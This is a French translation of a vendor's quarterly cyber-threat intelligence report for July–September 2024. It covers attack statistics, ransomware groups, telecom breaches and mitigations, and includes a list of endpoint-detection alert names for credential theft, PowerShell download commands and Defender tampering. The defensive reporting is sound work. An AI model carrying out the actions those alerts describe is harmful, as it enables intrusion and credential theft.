Rapport mondial de veille sur les menaces

Édition de janvier 2025

Période de référence : 1er juillet - 30 septembre 2024

Des renseignements utiles qui comptent

Ce rapport fournit un examen complet du paysage mondial des menaces, en mettant l'accent sur la fourniture de renseignements exploitables que les dirigeants peuvent utiliser pour sécuriser leurs organisations de manière proactive. Ce rapport couvre la période de juillet à septembre 2024.

Les solutions de cybersécurité BlackBerry® ont bloqué près d'un million d'attaques contre des clients américains, en identifiant 80 000 signatures malveillantes uniques et en empêchant 430 000 attaques ciblées contre des entreprises commerciales.

Pour plus d'informations, consultez le site Cyberattacks Across the Globe (en anglais).

Ce trimestre, sur les 600 000 attaques d'infrastructures critiques détectées, 45 % visaient des institutions financières.

Découvrez les conclusions internes et externes de notre équipe de renseignement sur les cybermenaces (CTI) dans la section " Infrastructures critiques".

Les attaques basées sur PowerShell démontrent l'adaptation régionale des acteurs de la menace tout en maintenant des techniques globales cohérentes dans les régions NALA, APAC et EMEA.

Découvrez comment l'analyse de notre équipe MDR révèle l'évolution des schémas d'attaque régionaux et la persistance mondiale des menaces basées sur PowerShell.

La section "Law Enforcement Limelight" révèle l'évolution du ransomware vers une guerre psychologique ciblée, avec des données exfiltrées de plus en plus souvent utilisées à des fins d'atteinte à la réputation et de levier stratégique plutôt que de simple gain financier.

En savoir plus sur l'épidémie de ransomware qui touche le Canada.

 

RansomHub héberge désormais des affiliés majeurs, dont LockBit et ALPHV, à l'origine de la majorité des opérations de ransomware détectées au troisième trimestre 2024.

En savoir plus sur les acteurs de la menace et l'outillage.

Le nouveau groupe de ransomware Lynx utilise des tactiques agressives de double extorsion (combinant le vol de données et le cryptage) et s'étend de l'Amérique du Nord et de l'Australie vers les marchés européens.

Consultez notre section sur les menaces prévalentes pour en savoir plus sur les menaces en cours dans les principaux systèmes d'exploitation.

Nous fournissons une liste de protocoles et de contre-mesures de sécurité renforcés pour faire face à l'évolution des tactiques des ransomwares, en mettant l'accent sur la réduction de l'exposition et la sécurité de la communication.

Voir la liste dans les Stratégies d'atténuation des risques.

Trouver des stratégies d'atténuation détaillées en réponse aux Salt Typhoon des violations, en se concentrant sur la protection des infrastructures de communication critiques.

Explorer les stratégies de défense pour protéger les infrastructures de communication critiques.

Table des matières

Le BlackBerry® Global Threat Intelligence Report fournit des informations essentielles aux RSSI et aux décideurs, en se concentrant sur les menaces et les défis les plus récents en matière de cybersécurité dans leurs secteurs d'activité et régions spécifiques.

En 2024, de nombreux facteurs ont façonné le paysage des menaces de cybersécurité. Des élections clés dans le monde entier, des conflits en cours et des tensions géopolitiques sur diverses questions litigieuses ont créé un environnement instable. Cette agitation a donné du pouvoir aux acteurs malveillants et aux groupes de cybermenaces à l'échelle mondiale. Ces entités exploitent l'incertitude et l'agitation pour réaliser des profits financiers, mener des opérations de cyberespionnage, causer des dommages ou amplifier le chaos.

Cyberattaques dans le monde entier

Les performances de BlackBerry en matière de cybersécurité basées sur l'IA

Au cours de la période de trois mois allant de juillet à septembre 2024, les solutions de cybersécurité pilotées par l'IA de BlackBerry ont protégé une grande variété de clients à travers le monde. Notre technologie de sécurité a déjoué près de deux millions de cyberattaques et enregistré plus de 3 000 hachages malveillants uniques par jour ciblant nos clients.

Les États-Unis ont été confrontés au plus grand nombre de cyberattaques au cours de ce trimestre, bien plus que tout autre pays. La technologie de cybersécurité de BlackBerry a bloqué près d'un million d'attaques contre des clients américains, dont environ 80 000 impliquant l'utilisation de hachages malveillants uniques.

BlackBerry suit le nombre de hachages malveillants uniques utilisés dans ces attaques, par rapport au nombre total d' attaques. Souvent, des logiciels malveillants de base ou "prêts à l'emploi" sont réutilisés dans des attaques à grande échelle, ce qui fait que le même binaire est identifié plusieurs fois.

Les logiciels malveillants uniques ou nouveaux sont généralement utilisés dans le cadre d'attaques très ciblées. Les clients de BlackBerry dans la région Amérique du Nord et Amérique Latine (NALA) ont enregistré le plus grand nombre de tentatives d'attaques (c'est-à-dire les attaques stoppées par les solutions de cybersécurité de BlackBerry) et le plus grand nombre de hachages uniques. La région APAC (Asie et Pacifique) s'est classée en deuxième position et la région EMEA (Europe, Moyen-Orient, Afrique) en troisième position.

Figure 1 : Attaques stoppées par rapport aux hachages uniques par région juillet - septembre 2024.
Figure 1 : Attaques stoppées par rapport aux hachages uniques par région juillet - septembre 2024.

Au cours de cette période, l'analyse de l'équipe BlackBerry Managed Detection and Response (MDR) a révélé des modèles régionaux distincts dans l'activité des menaces. Les attaques basées sur PowerShell sont apparues comme une menace globale cohérente, avec une exécution codée en Base64 apparaissant dans les cinq premières détections dans toutes les régions - se classant premier dans NALA, cinquième dans APAC et troisième dans EMEA.

Chaque région présente également des caractéristiques uniques en matière de menaces :

  • La NALA a constaté d'importants volumes d'abus d'outils système, les outils Sysinternals renommés et les shells LOLBAS (Living Off the Land Binaries and Scripts) figurant parmi les principales préoccupations.
  • L'APAC a été confrontée à d'importantes tentatives de vol d'informations d'identification et d'évasion de défense, ciblant en particulier Windows Defender.
  • La région EMEA a montré des schémas d'attaque variés, allant des commandes de téléchargement PowerShell à la manipulation de comptes d'utilisateurs.

Ces différences régionales dans les modèles de cyberattaques suggèrent que les acteurs de la menace adaptent leurs approches en fonction des facteurs régionaux, tout en conservant certaines techniques cohérentes à l'échelle mondiale.

Figure 2 : Les cinq principales alertes CylanceMDR par région.

NALA

1er : Exécution suspecte de PowerShell encodée en Base64
2ème : Exécution d'un outil Sysinternals éventuellement renommé
3ème : Les services ont lancé un shell LOLBAS
4ème : Exécution d'outils d'accès à distance
5ème : Exécution d'une commande de téléchargement PowerShell : Exécution d'une commande de téléchargement PowerShell

APAC

1er : Possibilité de vol de données d'identification Windows
2ème : La tâche planifiée Svchost lance Rundll32
3ème : Falsification de Windows Defender via PowerShell
4ème : Abus possible de Msiexec via le chargement de DLL
5ème : Exécution suspecte de PowerShell encodé en Base64

EMEA

1er : Exécution de la commande de téléchargement PowerShell
2ème : Abus possible de la ligne de commande stdout
3ème : Exécution suspecte de PowerShell encodé en Base64
4ème : Création d'un compte utilisateur via Net Local Group Add
5ème : La tâche de planification Svchost lance Rundll32

Analyse géopolitique et commentaires

Il y a plus de dix ans, Leon Panetta, alors secrétaire américain à la défense, mettait en garde contre un "cyber Pearl Harbor" potentiel, soulignant la perspective d'une cyberattaque paralysante sur les infrastructures essentielles des États-Unis qui se répercuterait sur le monde cyber-physique. Bien que son terrible avertissement ne se soit pas encore concrétisé, notre dépendance à l'égard des technologies numériques vulnérables aux attaques, à l'exploitation et à la manipulation s'est accrue. Certains ont qualifié la situation difficile dans laquelle se trouvent nos sociétés numérisées de "marché diabolique" qui a compromis la sécurité au profit de la croissance économique, de l'augmentation de la productivité et de la commodité.

Il y a dix ans, il n'y avait qu'une poignée d'acteurs principalement étatiques capables de mener des cyberattaques sophistiquées. Aujourd'hui, il existe des centaines d'acteurs étatiques et non étatiques. La dernière évaluation nationale de la cybermenace réalisée par le gouvernement canadien, ainsi que les évaluations de la cybermenace réalisées par d'autres pays alliés tels que le Royaume-Uni, décrivent l'état de la cyberinsécurité comme étant de plus en plus imprévisible, avec un nombre croissant d'acteurs agressifs qui adoptent de nouvelles technologies et de nouvelles tactiques pour améliorer et amplifier leurs activités malveillantes.

L'impact de cette prolifération est omniprésent. Selon la Global Anti-Scam Alliance, on estime que 25,5 % de la population mondiale sera touchée par la fraude cybernétique en 2023. Au Royaume-Uni, plus de 70 % des moyennes et grandes entreprises et près de 66 % des organismes de bienfaisance à revenu élevé ont subi une forme ou une autre de violation de la cybersécurité. Au Canada, plus de deux tiers (70 %) des Canadiens ont subi un incident de cybersécurité au cours de l'année écoulée. L'analyse de BlackBerry confirme ces tendances et met en évidence l'augmentation des cyberattaques contre les infrastructures critiques.

Les rançongiciels sont largement considérés comme la forme la plus perturbatrice de la cybercriminalité et l'on craint de plus en plus qu'ilsne paralysent non seulement les entreprises, mais aussi les pays. En fait, les attaques de ransomware contre les infrastructures critiques, telles que le secteur de la santé, sont en nette augmentation. Aux États-Unis, le ministère de la Santé et des Services sociaux a signalé une augmentation de 278 % des grandes violations de données impliquant des ransomwares dans les hôpitaux entre 2018 et 2022. La prolifération des attaques de ransomware s'accompagne d'une diversification des tactiques et des techniques utilisées par les acteurs de ce type d'attaques. Les groupes de ransomware emploient désormais des stratégies d'extorsion à multiples facettes qui impliquent l'exfiltration et le cryptage des données des victimes, tout en maintenant des sites de fuite de données sur le dark web où sont affichées les données volées aux victimes qui ne se conforment pas à la loi. Le réseau de la criminalité devient de plus en plus complexe.

Le défi n'est pas seulement technique. La réalité alarmante est que les opérations de cybercriminalité ont un impact négatif sur le bien-être humain. Des chercheurs ont constaté une augmentation de 35 à 41 % de la mortalité hospitalière à la suite d'une attaque de ransomware contre un hôpital. D 'autres études ont montré que les attaques par ransomware ont un effet en cascade sur les services d'urgence adjacents, provoquant des perturbations opérationnelles importantes et ayant un impact négatif sur l'arrivée des ambulances, les temps d'attente pour les traitements et les soins prodigués aux patients.

Une autre tendance alarmante est l'émergence d'une industrie de la traite des êtres humains liée à la cybercriminalité. Les Nations unies ont recensé environ 220 000 personnes victimes de la traite dans le cadre d'opérations de cybercriminalité en Asie du Sud-Est en 2023. Ces personnes voient leur vie menacée et sont soumises à la torture et à des peines ou traitements cruels, inhumains et dégradants, à la détention arbitraire, à la violence sexuelle, au travail forcé et à d'autres formes d'exploitation. Les groupes criminels organisés mènent de telles opérations à partir du Cambodge depuis plus d'une décennie et se sont depuis étendus à d'autres pays tels que le Myanmar, la Thaïlande, le Laos et les Philippines. Dans certains cas, des personnes sont acheminées vers ces sites d'opérations cybercriminelles forcées en Asie du Sud-Est depuis des pays aussi éloignés que le Brésil et l'Afrique de l'Est.

Alors que les cybermenaces prolifèrent, les gouvernements et l'industrie travaillent d'arrache-pied pour perturber l'écosystème des ransomwares et renforcer notre capacité collective à dissuader les cyberacteurs malveillants. En octobre 2024, BlackBerry et Sécurité publique Canada ont accepté de coprésider le groupe consultatif du secteur public-privé de l'initiative internationale de lutte contre les rançongiciels (CRI). Avec les 68 États membres de la CRI, BlackBerry travaille à renforcer la résilience collective contre les ransomwares et à mieux équiper les gouvernements du monde entier pour contrer la menace des ransomwares et d'autres menaces cybernétiques.

Figure 3 : Répartition des attaques et des hachages uniques dans les infrastructures critiques et les entreprises commerciales, avril - juin 2024 vs. juillet - septembre 2024.

Paysage des cyberattaques par secteur d'activité

En passant d'une perspective globale à une approche sectorielle, les analystes de BlackBerry ont identifié les principales cibles des acteurs de la menace. Pour les besoins de ce rapport, les secteurs industriels sont regroupés en deux grandes catégories : les infrastructures critiques et les les entreprises commerciales.

BlackBerry recueille des données télémétriques et des statistiques sur les clients des infrastructures critiques dans les 16 secteurs d'activité définis par l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA). Il s'agit notamment des secteurs de la santé, de l'administration, de l'énergie, de la finance et de la défense. Les entreprises commerciales sont celles qui produisent, distribuent ou vendent des biens et des services. Ces entreprises opèrent dans divers secteurs tels que la fabrication, la vente au détail et les services. La figure 3 ci-dessous montre la répartition des attaques et des hachages uniques entre les infrastructures critiques et les entreprises commerciales.

Figure 3 : Répartition des attaques et des hachages uniques dans les infrastructures critiques et les entreprises commerciales, avril - juin 2024 vs. juillet - septembre 2024.

Menaces sur les infrastructures critiques

Les infrastructures critiques peuvent constituer une cible potentiellement lucrative pour les cybercriminels. Les données précieuses détenues par ces industries sont souvent vendues sur des marchés souterrains, utilisées pour planifier de futures attaques ou exploitées à des fins d'espionnage. On a assisté récemment à une recrudescence des attaques visant les secteurs des infrastructures critiques tels que les soins de santé, l'énergie, la finance et la défense. Pour les organisations de ces secteurs, les temps d'arrêt sont coûteux. Elles sont plus enclines à payer une rançon pour restaurer rapidement leurs systèmes en raison des pertes potentielles qu'elles-mêmes et leurs clients pourraient subir du fait des temps d'arrêt et de l'impossibilité d'accéder à des données essentielles.

Avec la numérisation d'un nombre croissant de services et la connexion à Internet d'un nombre sans précédent de systèmes, les organisations de ces secteurs se retrouvent souvent dans la ligne de mire des cybercriminels. Ces groupes criminels vont des pirates novices cherchant à se faire reconnaître par leurs pairs aux acteurs de la menace des États-nations organisés et aux groupes de ransomwares établis cherchant à infliger le chaos à leurs ennemis. L'impact de ces attaques peut être dévastateur, affectant la sécurité nationale et perturbant les opérations essentielles, tout en mettant en danger la stabilité économique et même des vies humaines.

Les solutions de cybersécurité de BlackBerry, y compris les solutions de cybersécurité. CylanceENDPOINT™, ont déjoué près de 600 000 attaques sur les infrastructures critiques ce trimestre, avec 45% de ces attaques ciblant le secteur financier. La finance continue d'être une cible populaire pour les cyberattaquants.

Figure 4 : Répartition des attaques et des hachages uniques par secteur d'infrastructure critique.
Figure 4 : Répartition des attaques et des hachages uniques par secteur d'infrastructure critique.
Dans cette prochaine section, nous allons examiner de plus près certaines des menaces les plus répandues pour les infrastructures critiques que nous avons rencontrées au cours de ce trimestre. La première partie énumère les types de menaces que BlackBerry identifie le plus souvent et contre lesquelles elle se protège au sein de sa base de clients. La deuxième partie couvre les menaces signalées par des tiers, tels que des publications d'actualité, des fournisseurs de sécurité ou des agences gouvernementales.
Figure 5 : Répartition des menaces internes liées au BlackBerry dans les infrastructures critiques au cours de ce trimestre.

Menaces pour les entreprises commerciales

L'industrie des entreprises commerciales, qui couvre des secteurs tels que les biens d'équipement, le commerce de détail et le commerce de gros, est une cible de choix pour les cyberattaques sophistiquées. Les violations réussies peuvent compromettre les réseaux, entraîner des pertes de données, des perturbations opérationnelles, des atteintes à la réputation et des coûts financiers importants.

Ce trimestre, les solutions de cybersécurité de BlackBerry ont arrêté plus de 430 000 attaques ciblées contre des entreprises commerciales. Le graphique ci-dessous illustre les industries qui ont reçu le plus grand volume de tentatives d'attaques et de hashs de logiciels malveillants uniques.

Figure 6 : Répartition des attaques bloquées et des hachages uniques dans les entreprises commerciales.
Figure 6 : Répartition des attaques bloquées et des hachages uniques dans les entreprises commerciales.
Figure 7 : Principales menaces internes contre les entreprises commerciales de juillet à septembre 2024.
Figure 7 : Principales menaces internes contre les entreprises commerciales de juillet à septembre 2024.

Sécurité des communications : Menaces et mesures d'atténuation

En raison de son utilisation quasi universelle, l'infrastructure moderne des télécommunications est aujourd'hui confrontée à un éventail sans précédent de menaces sophistiquées visant ses opérations fondamentales et ses flux de données. Qu'il s'agisse d'acteurs étatiques menant des activités d'espionnage à grande échelle ou d'entreprises cybercriminelles proposant des services d'interception, ces menaces exploitent les compromis inhérents entre la connectivité mondiale et la sécurité dans les réseaux de télécommunications publics de chaque pays.

Alors que les organisations dépendent de plus en plus des communications mobiles et numériques pour leurs opérations sensibles, les failles de sécurité dans ces réseaux sont devenues des vulnérabilités critiques qui pourraient potentiellement exposer des avantages concurrentiels, des plans stratégiques et des informations confidentielles. La récente cascade de brèches dans les réseaux de télécommunications montre qu'aucune organisation ne peut supposer que ses communications sont sécurisées simplement parce qu'elle utilise les services d'un opérateur standard.

Au début de ce trimestre, AT&T a révélé une faille de sécurité majeure dans laquelle des acteurs menaçants ont compromis les enregistrements d'appels et de textes de leurs clients cellulaires sur une période prolongée ; nous savons maintenant que de multiples organisations de télécommunications ont été infiltrées. Certains dirigeants américains ont déclaré qu'il s'agissait de"la pire faille dans le secteur des télécommunications de l'histoire de notre pays". La faille d'AT&T a été très importante car elle a touché non seulement les abonnés d'AT&T, mais aussi toute personne dans le monde ayant communiqué avec un client d'AT&T au cours de la période concernée. Les données compromises comprenaient des métadonnées potentiellement précieuses sur les habitudes de communication, le moment des appels et les relations entre les utilisateurs.

Dans cette section, nous examinerons les différents types d'entités qui menacent les infrastructures de communication, les tactiques qu'elles utilisent et les mesures d'atténuation que les organisations peuvent prendre pour protéger leurs données.

 

Acteurs de la menace

Les acteurs étatiques représentent une menace importante pour la sécurité des télécommunications internationales, comme en témoignent les récents événements au cours desquels des attaquants liés au gouvernement chinois ont mené une vaste campagne de cyber-espionnage. Ces acteurs sophistiqués ont ciblé de grandes entreprises de télécommunications pour accéder aux données des téléphones portables de personnalités importantes, y compris des candidats à la présidence des États-Unis.

Les autorités américaines pensent qu'un acteur de la menace connu sous le nom de Salt Typhoon, étroitement lié au ministère chinois de la sécurité de l'État, est à l'origine de la campagne d'infiltration des télécommunications. Leurs opérations ont touché plusieurs grands opérateurs, dont Verizon, AT&T et T-Mobile, et les enquêteurs ont découvert qu'ils étaient restés indétectés dans ces réseaux pendant plus d'un an.

Les entités criminelles ont évolué au fil du temps pour fournir des services d'attaque hautement spécialisés dans le secteur des télécommunications. Il s'agit notamment d'organisations qui proposent l'interception d'appels en tant que service et exploitent des plates-formes d'écoute téléphonique en tant que service, avec des services facilement disponibles à l'achat sur l'internet. Certains acteurs de la menace ont développé des capacités de redirection et d'interception des connexions cellulaires pour n'importe quel numéro de téléphone à l'insu de l'utilisateur final.

Le secteur des télécommunications est également menacé par des adversaires qui cherchent à obtenir des avantages en exploitant les communications. Ces acteurs ciblent des personnes et des organisations de premier plan en utilisant des données interceptées pour tenter de les faire chanter ou pour exposer des relations confidentielles afin de saper la confiance du public dans la personne ciblée. Leur capacité à identifier et éventuellement à exposer des partisans très connus de candidats politiques qui tentent de rester hors de la vue du public ou des personnes dont la sécurité physique dépend de leur anonymat, comme les journalistes, les reporters et les activistes politiques, est particulièrement préoccupante.

Menaces identifiées

Les vulnérabilités inhérentes aux réseaux de télécommunications peuvent potentiellement exposer les organisations à un réseau complexe de menaces interconnectées. Si les réseaux de télécommunications publics sont excellents pour offrir une accessibilité mondiale, cette accessibilité s'accompagne de compromis en matière de sécurité que les acteurs malveillants peuvent exploiter (et exploitent souvent).

De l'interception directe des communications à l'analyse sophistiquée des métadonnées, ces menaces visent non seulement le contenu des communications, mais aussi les modèles et les relations qu'elles révèlent. Les récentes atteintes aux droits des principaux fournisseurs de télécommunications ont démontré que ces menaces ne sont pas simplement théoriques, mais qu'elles représentent des risques actifs pour la confidentialité entre employeurs et employés, l'avantage concurrentiel et même la sécurité nationale. Voici quelques-uns de ces risques :

Interception des communications : Les acteurs de la menace peuvent intercepter les appels audio/vidéo et les messages SMS, ce qui leur permet d'écouter les communications en temps réel. La plupart des risques que ces vulnérabilités présentent pour la téléphonie standard existent également dans les applications gratuites utilisées pour les appels vocaux et la messagerie.

Exploitation des métadonnées : Avec l'exploitation des métadonnées, les acteurs de la menace collectent et analysent les enregistrements détaillés des appels (CDR) et des messages (MDR). Ces données leur permettent d'établir des cartes détaillées des relations de contact et d'analyser les schémas de communication, notamment la fréquence, l'heure de la journée et la durée des appels. La visibilité en temps réel de ces métadonnées permet aux acteurs de la menace de suivre les abonnés des différents opérateurs de télécommunications et d'identifier les schémas de communication exploitables.

Ismael Valenzuela, vice-président de BlackBerry Threat Research and Intelligence, explique : " Les métadonnées des télécommunications peuvent être une mine d'or pour les cybercriminels. Même si le contenu des appels et des textes ne fait pas l'objet d'une fuite, la connaissance du contexte de ces appels, par exemple qui appelle une personne, à quelle fréquence et à quel moment, peut être facilement utilisée comme arme. Les acteurs de la menace peuvent savoir approximativement où vous vivez, où vous travaillez, à qui vous parlez le plus souvent et même si vous appelez des numéros potentiellement sensibles, tels que des fournisseurs de soins de santé".

Attaques basées sur l'identité : L'absence de validation de l'identité dans les réseaux publics rend l'usurpation d'identité et de numéro de téléphone endémique et presque impossible à prévenir. Les acteurs de la menace peuvent utiliser des métadonnées volées pour cibler spécifiquement les abonnés des télécommunications en usurpant les numéros avec lesquels ils ont déjà communiqué. Ceux qui décrochent seront très probablement soumis à des appels robotisés, mais dans certains cas, les attaquants peuvent utiliser de nouvelles technologies telles que les générateurs de voix profondes pour mettre au point des escroqueries complexes à l'identité.

Le clonage de la voix d'une personne réelle à l'aide de l'IA générative est connu sous le nom de " deepfake audio". Ces types d'attaques gagnent rapidement du terrain dans le monde de l'entreprise, car les attaquants comptent littéralement sur le fait que les employés font confiance à la voix d'une personne qu'ils connaissent - comme leur patron - et abusent de cette confiance pour perpétuer des escroqueries financières très coûteuses.

Vulnérabilités de l'infrastructure : L'infrastructure moderne des télécommunications présente des défis particulièrement difficiles à relever. Les réparations nécessitent souvent le remplacement complet des composants du système, ce qui peut entraîner des interruptions de service et exiger des investissements importants de la part des fournisseurs de télécommunications.

  • Composants de systèmes anciens : Des parties essentielles de l'épine dorsale des télécommunications fonctionnent encore sur des systèmes datant des années 1970 et 1980, qui sont antérieurs aux protections modernes en matière de cybersécurité et qui ont été conçus principalement pour les opérations par ligne terrestre. Pour mettre ces composants vieillissants en conformité avec les mesures de sécurité actuelles, il faudrait les renforcer en acheminant les communications par des réseaux de relais sécurisés et en mettant en œuvre un cryptage de bout en bout qui protège à la fois le contenu des données et leurs schémas de transmission.
  • Points d'accès au réseau : Les protocoles d'itinérance cellulaire entre opérateurs contiennent des faiblesses inhérentes qui permettent à des acteurs malveillants de rediriger et d'intercepter les connexions cellulaires. Cette vulnérabilité existe chez tous les grands opérateurs, y compris AT&T, Verizon et T-Mobile, comme le montre l'exploitation réussie parSalt Typhoon de nœuds de réseau chez plusieurs fournisseurs.
  • Systèmes d'authentification : Les contrôles de sécurité de base tels que l'authentification multifactorielle sont notablement absents de certains composants de l'infrastructure de télécommunications critique. Cette lacune permet aux acteurs de la menace de maintenir un accès persistant une fois qu'ils sont entrés dans l'infrastructure.
  • Systèmes de surveillance : L'infrastructure d'"interception légale", conçue pour les opérations de surveillance légale, peut être compromise et révéler des données opérationnelles sensibles sur les enquêtes en cours et les cibles de surveillance.
  • Points de transit des données : Les interconnexions entre les fournisseurs de services Internet et les réseaux de télécommunications créent des points de vulnérabilité supplémentaires où le courrier électronique non crypté et d'autres communications peuvent être interceptés.
  • Infrastructure d'acheminement mondial : La conception fondamentale des réseaux de télécommunications donne la priorité à la connectivité mondiale plutôt qu'à la sécurité, ce qui crée des vulnérabilités inhérentes à la manière dont les appels et les données sont acheminés entre les fournisseurs et entre les régions.

Collecte de renseignements : Les violations des télécommunications aident grandement les acteurs de la menace dans leurs capacités de collecte de renseignements. Ces derniers peuvent utiliser les fuites d'informations pour surveiller en temps réel des abonnés spécifiques et, dans certains cas, identifier des relations cachées. Dans le contexte des campagnes politiques, cette surveillance leur permet de découvrir des partisans de premier plan qui tentent de préserver leur vie privée et d'exposer des relations confidentielles. Ces renseignements peuvent révéler d'autres schémas de communication susceptibles d'être exploités de manière inattendue.

"Vous pouvez penser que vous n'avez rien qu'un attaquant puisse vouloir", ajoute M. Valenzuela, "mais le simple fait de savoir qui vous appelez le plus régulièrement et en qui vous seriez le plus susceptible d'avoir confiance et donc de décrocher un appel, permet aux cybercriminels de perpétrer plus facilement n'importe laquelle des nombreuses escroqueries par téléphone, y compris celles qui s'appuient sur une fausse voix pour usurper la voix d'une personne que vous connaissez".

Menaces secondaires : L'exploitation des vulnérabilités des télécommunications peut conduire à des menaces secondaires. Il s'agit notamment de tentatives de chantage, en particulier lorsque des relations confidentielles sont exposées. En outre, les informations compromises peuvent être utilisées pour la collecte de renseignements sur la concurrence et l'espionnage. La compromission d'une personne, d'une entité ou d'une organisation de premier plan peut même avoir un impact sur les processus démocratiques et menacer la sécurité nationale.

Selon David Wiseman, vice-président de BlackBerry SecuSUITE®les secrets qui procurent des avantages concurrentiels - que ce soit sur le marché ou sur le champ de bataille - sont vulnérables à l'exposition. Les réseaux de télécommunications publics sont principalement conçus pour être accessibles, ce qui conduit souvent à des compromis en matière de sécurité.

Les réseaux publics, y compris les plateformes de messagerie chiffrée, posent un problème important : leur nature ouverte permet à pratiquement n'importe qui de s'y inscrire. Wiseman explique : "Sur des plateformes comme Signal ou WhatsApp, les utilisateurs s'inscrivent eux-mêmes, ce qui contribue à des problèmes tels que l'usurpation d'identité, la fraude et les inquiétudes concernant les "deepfakes". Les systèmes ouverts avec auto-enregistrement sont intrinsèquement à haut risque".

Atténuations

Pour faire face à l'évolution des menaces liées aux télécommunications, les entreprises doivent mettre en œuvre des mesures de sécurité complètes qui vont au-delà du simple cryptage. Si les outils de communication grand public offrent une certaine protection, ils ne permettent pas de faire face aux attaques sophistiquées ciblant à la fois le contenu des messages et les métadonnées.

Une défense efficace nécessite une approche à plusieurs niveaux qui associe des solutions technologiques à des protocoles stratégiques et à la vigilance humaine. Les stratégies suivantes fournissent un cadre permettant aux organisations de protéger leurs communications sensibles contre les acteurs étatiques, les entités criminelles et les autres acteurs qui cherchent à exploiter les vulnérabilités des télécommunications.

Authentification et vérification de l'identité : Les protocoles d'authentification multifactorielle (AMF) et de vérification de l'identité constituent des défenses essentielles de première ligne contre les accès non autorisés et les attaques d'ingénierie sociale.

  • Tactique : mettre en place des systèmes d'authentification robustes tout en formant les utilisateurs à vérifier les communications inattendues par des canaux alternatifs ou secondaires.
  • Exemple : Lorsqu'un cadre reçoit un message urgent d'un membre du conseil d'administration en dehors des heures normales et formulant une demande inhabituelle, il suit le protocole en procédant à une vérification par un canal de communication distinct préétabli.

Sécurité des liens et des messages : Les attaques par ingénierie sociale exploitent la confiance dans des numéros de téléphone et des sources de messages familiers pour diffuser des contenus malveillants.

  • Tactique : Établir des protocoles stricts pour le traitement des liens et mettre en œuvre des systèmes qui analysent et vérifient le contenu des messages avant leur transmission.
  • Exemple : Une institution bancaire met en œuvre une politique de non-clic sur les liens externes, exigeant que toutes les communications importantes se fassent au sein de sa propre plateforme sécurisée.

Contrôle de l'infrastructure : Les organisations ont besoin d'une surveillance complète de leurs canaux de communication pour empêcher les accès non autorisés et maintenir les normes de sécurité.

  • Tactique : Déployer des systèmes de communication dans lesquels l'organisation conserve le contrôle total de l'infrastructure, de l'autorisation des utilisateurs et des protocoles de sécurité.
  • Exemple : Une entreprise de défense met en place un système de communication en boucle fermée dans lequel tous les utilisateurs doivent être préautorisés et toutes les communications sont acheminées par des canaux sécurisés et surveillés.

Protection des métadonnées : Les schémas de communication et les métadonnées peuvent révéler des informations sensibles, même lorsque le contenu du message est sécurisé.

  • Tactique : Cryptage et tunnelisation de toutes les métadonnées, y compris les informations sur l'appelant, la durée de la communication et les schémas de relation entre les utilisateurs.
  • Exemple : Une institution financière empêche ses concurrents de cartographier ses discussions de fusion en cryptant non seulement les communications, mais aussi les schémas de communication des cadres entre eux.

Amélioration de la sécurité mobile : Les communications mobiles posent des problèmes de sécurité uniques qui nécessitent des solutions cryptographiques spécialisées.

  • Tactique : mettre en œuvre des authentifications cryptographiques certifiées pour toutes les communications mobiles afin d'empêcher l'usurpation d'identité, la fraude et l'accès non autorisé.
  • Exemple : Une agence gouvernementale déploie des appareils mobiles dotés d'une authentification cryptographique intégrée, garantissant que toutes les communications sont vérifiées et sécurisées, quel que soit l'endroit où elles se trouvent.

Contrôle du cycle de vie des données : Les systèmes de communication traditionnels abandonnent le contrôle des données une fois qu'elles sont partagées, ce qui crée des vulnérabilités permanentes en matière de sécurité.

  • Tactique : maintenir la propriété organisationnelle de toutes les données partagées avec la possibilité de révoquer l'accès ou de supprimer le contenu à tout moment.
  • Exemple : Lorsqu'un cadre quitte une entreprise du Fortune 100, l'organisation révoque immédiatement l'accès à tous les documents et communications précédemment partagés.

Défense contre l'ingénierie sociale : Le comportement humain de base présente souvent la plus grande vulnérabilité en matière de sécurité dans les systèmes de communication.

  • Tactique : mettre en œuvre des programmes de formation complets soutenus par des systèmes automatisés afin de détecter et de prévenir les tentatives d'ingénierie sociale.
  • Exemple : La plateforme de communication sécurisée d'une organisation signale automatiquement tout modèle ou demande de communication inhabituel et exige une vérification supplémentaire.

Intégration de l'évaluation des risques : Les mesures de sécurité doivent être adaptées aux risques spécifiques de l'organisation et aux exigences réglementaires.

  • Tactique : Évaluer régulièrement les risques liés à la sécurité des communications et adapter les protocoles en fonction des menaces émergentes et des besoins en matière de conformité.
  • Exemple : Un prestataire de soins de santé procède à des évaluations trimestrielles de ses mesures de sécurité des communications, en mettant à jour les protocoles en fonction des nouvelles informations sur les menaces et des changements réglementaires.

Intégration holistique de la sécurité : La sécurité des communications doit être intégrée dans une stratégie de cybersécurité plus large.

  • Tactique : Veiller à ce que les communications sécurisées fonctionnent de concert avec d'autres mesures et protocoles de sécurité.
  • Exemple : Une entreprise manufacturière intègre sa plateforme de communication sécurisée à ses systèmes de contrôle d'accès et de prévention des pertes de données, créant ainsi un écosystème de sécurité unifié.

Architecture des données temporaires : Le stockage permanent des données accroît la vulnérabilité aux violations et aux accès non autorisés.

  • Tactique : mettre en œuvre des systèmes qui minimisent la persistance des données grâce à des protocoles de stockage temporaire et de purge automatique.
  • Exemple : La plateforme de communication d'un cabinet juridique supprime automatiquement les messages des serveurs immédiatement après confirmation de la livraison à tous les destinataires autorisés.

Lisez notre blog pour en savoir plus sur la manière dont les acteurs de la menace utilisent et abusent des métadonnées volées dans les communications mobiles.

Les dangers des Deepfakes

Le FBI a récemment publié une mise en garde contre les cybercriminels qui utilisent l'IA générative pour commettre des fraudes à grande échelle, en ciblant les entreprises commerciales et les organisations financières avec des escroqueries élaborées. L'avis met en garde contre les ramifications des fausses vidéos et des faux appels vocaux, ainsi que des images de profil générées par l'IA pour usurper l'identité de personnes susceptibles d'être utilisées dans des escroqueries à l'embauche, comme la campagne nord-coréenne visant à infiltrer des entreprises informatiques occidentales avec des espions se faisant passer pour des travailleurs à distance.

Cette surface de cyberattaque nouvellement élargie constitue une menace très réelle pour les entreprises commerciales de toutes tailles, avec des pertes prévues pour atteindre un montant stupéfiant de 40 milliards de dollars d'ici 2027. Comme l'a récemment expliqué Shiladitya Sircar, vice-président principal de l'ingénierie des produits et de la science des données chez BlackBerry, dans un épisode du podcastUnsupervised Learning de Daniel Miessler, "ce type d'adversaire IA génératif crée de nouveaux vecteurs d'attaque avec toutes ces informations multimodales que personne ne voit venir. Il crée un paysage de menaces plus complexe et plus nuancé qui donne la priorité aux attaques basées sur l'identité, et cela ne fera que s'améliorer".

